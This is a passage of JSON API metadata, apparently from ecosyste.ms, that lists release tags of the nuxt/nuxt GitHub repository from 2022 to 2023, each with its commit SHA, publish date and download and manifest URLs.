uxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a